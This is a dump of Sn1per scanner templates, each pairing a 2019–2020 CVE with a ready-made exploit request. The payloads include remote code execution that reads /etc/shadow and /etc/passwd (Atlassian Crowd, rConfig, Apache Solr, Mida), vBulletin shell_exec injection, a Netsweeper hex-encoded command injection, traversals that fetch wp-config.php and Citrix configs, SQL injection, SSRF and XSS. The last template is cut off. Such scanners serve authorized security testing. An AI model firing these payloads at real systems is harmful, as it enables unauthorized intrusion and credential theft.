/Sn1per/templates/active/CVE-2019-11580_-_Atlassian_Crowd_Data_Center_Unauthenticated_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE' 3 | URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-11581 - Jira Template Injection' 3 | URI='/secure/ContactAdministrators!default.jspa' 4 | METHOD='GET' 5 | MATCH='Contact Site Administrators' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure' 3 | URI="/cgi-bin/config.exp" 4 | METHOD='GET' 5 | MATCH="sysconfig" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution' 3 | URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='--user-agent "" -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution' 3 | URI='/' 4 | METHOD='POST' 5 | MATCH='1787569' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='-d "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1787568))%27%29%3B+exit%3B" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass' 3 | URI='/ajax/render/widget_tabbedcontainer_tab_panel' 4 | METHOD='POST' 5 | MATCH='PHP\ Version' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='-d "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 10 | -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-17558 - Apache Solr RCE' 3 | URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-19719_Tableau_Server_DOM_XSS.py: -------------------------------------------------------------------------------- 1 | # Import any WebDriver class that you would usually import from 2 | # selenium.webdriver from the seleniumrequests module 3 | import sys 4 | from seleniumrequests import Firefox 5 | 6 | url = sys.argv[1] 7 | # Simple usage with built-in WebDrivers: 8 | webdriver = Firefox() 9 | response = webdriver.request('GET', '%s/en/embeddedAuthRedirect.html?auth=javascript:document.write(1+1336)' % url) 10 | if '1337' in response.text: 11 | print("Vulnerable!") 12 | print(response.text) 13 | webdriver.quit() 14 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal' 3 | URI='/vpn/../vpns/cfg/smb.conf' 4 | METHOD='GET' 5 | MATCH='\[global\]' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS' 3 | URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E" 4 | METHOD='GET' 5 | MATCH="<script>alert\(1337\)<\/script>" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails' 3 | URI="/../../../../../../../../etc/passwd\{\{" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-6340_-_Drupal8_REST_RCE_SA-CORE-2019-003.disabled: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-6340 - Drupal8 REST RCE SA-CORE-2019-003' 3 | URI='/node/1?_format=hal_json' 4 | METHOD='GET' 5 | MATCH='INVALID_VALUE\ does\ not\ correspond' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='--user-agent "" -s -L --insecure -H "Content-Type: application/hal+json" --data \'{ "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" }}\' ' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-7192 - QNAP Pre-Auth Root RCE' 3 | URI='/photo/p/api/video.php' 4 | METHOD='GET' 5 | MATCH="\[\ 401\ Unauthorized\ \]" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 1' 3 | URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" 4 | METHOD='GET' 5 | MATCH='artifactId' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-L --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 2' 3 | URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties" 4 | METHOD='GET' 5 | MATCH='artifactId' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-L --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-8451_Jira_SSRF_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 1' 3 | URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='<title>Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-8451_Jira_SSRF_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 2' 3 | URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-8451_Jira_SSRF_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 3' 3 | URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-8451_Jira_SSRF_4.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 4' 3 | URI="/confluence/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal' 3 | URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html" 4 | METHOD='GET' 5 | MATCH="apache2\.conf" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF' 3 | URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-0618_-_Remote_Code_Execution_SQL_Server_Reporting_Services.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-0618 - Remote Code Execution SQL Server Reporting Services' 3 | URI="/ReportServer/Pages/ReportViewer.aspx" 4 | METHOD='GET' 5 | MATCH="view\ report" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-10204_-_Sonatype_Nexus_Repository_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-10204 - Sonatype Nexus Repository RCE' 3 | URI="/extdirect" 4 | METHOD='POST' 5 | MATCH="1787569" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='--user-agent '' -s --insecure -L --data \'{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}\' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-1147_-_Remote_Code_Execution_in_Microsoft_SharePoint_Server.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server' 3 | URI="/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D" 4 | METHOD='GET' 5 | MATCH="List\ does\ not\ exist|It\ may\ have\ been\ deleted\ by\ another\ user" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-11530_-_Wordpress_Chop_Slider_3_Plugin_SQL_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11530 - Wordpress Chop Slider 3 Plugin SQL Injection' 3 | URI='/wp-content/plugins/chopslider/get_script/index.php?id=1111111' 4 | METHOD='GET' 5 | MATCH='chopslider_id_1111111' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal' 3 | URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" 4 | METHOD='GET' 5 | MATCH="root\:x" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 2' 3 | URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" 4 | METHOD='GET' 5 | MATCH="root\:x" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 3' 3 | URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php" 4 | METHOD='GET' 5 | MATCH="DB_NAME|DB_USER|COLLATE" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 4' 3 | URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php" 4 | METHOD='GET' 5 | MATCH="DB_NAME|DB_USER|COLLATE" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12271 - Sophos XG Firewall Pre-Auth SQL Injection' 3 | URI='/userportal/webpages/myaccount/login.jsp' 4 | METHOD='GET' 5 | MATCH='loginstylesheet' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 1' 3 | URI="/ajax/api/content_infraction/getIndexableContent" 4 | METHOD='POST' 5 | MATCH="6162636D31|database\ error" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 2' 3 | URI="/vb5/ajax/api/content_infraction/getIndexableContent" 4 | METHOD='POST' 5 | MATCH="6162636D31|database\ error" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 3' 3 | URI="/vb5/ajax/api/content_infraction/getIndexableContent" 4 | METHOD='POST' 5 | MATCH="vbulletinrce" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\" " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 1' 3 | URI="/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" 4 | METHOD='GET' 5 | MATCH="nonexistent" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS=' --user-agent '' -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 2' 3 | URI="/webadmin/out" 4 | METHOD='GET' 5 | MATCH="nonexistent" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS=' --user-agent '' -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-14181_-_User_Enumeration_Via_Insecure_Jira_Endpoint.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint' 3 | URI="/secure/ViewUserHover.jspa?username=randomUser" 4 | METHOD='GET' 5 | MATCH="User\ does\ not\ exist" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s --insecure -L " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-14815_-_Oracle_Business_Intelligence_Enterprise_DOM_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS' 3 | URI='/bi-security-login/login.jsp?msi=false&redirect=">' 4 | METHOD='GET' 5 | MATCH="Oracle\ Business\ Intelligence" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-15129_-_Open_Redirect_In_Traefik.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-15129 - Open Redirect In Traefik' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="Found" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'X-Forwarded-Prefix: https://google.com'" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-15920_-_Mida_eFramework_Unauthenticated_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-15920 - Mida eFramework Unauthenticated RCE' 3 | URI='/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING' 4 | METHOD='GET' 5 | MATCH='root\:' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-17519 - Apache Flink Path Traversal' 3 | URI="/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-2034_-_PAN-OS_GlobalProtect_OS_Command_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection' 3 | URI='/global-protect/login.esp' 4 | METHOD='GET' 5 | MATCH='ETag|Last-Modified' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 - Jenkins Gitlab Hook XSS' 3 | URI="/gitlab/build_now%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 1' 3 | URI="/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 2' 3 | URI="/jenkins/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 3' 3 | URI="/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 4' 3 | URI="/jenkins/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2020-2140_-_Jenkin_AuditTrailPlugin_XSS.sh: -------------------------------------------------------------------------------- 1 | 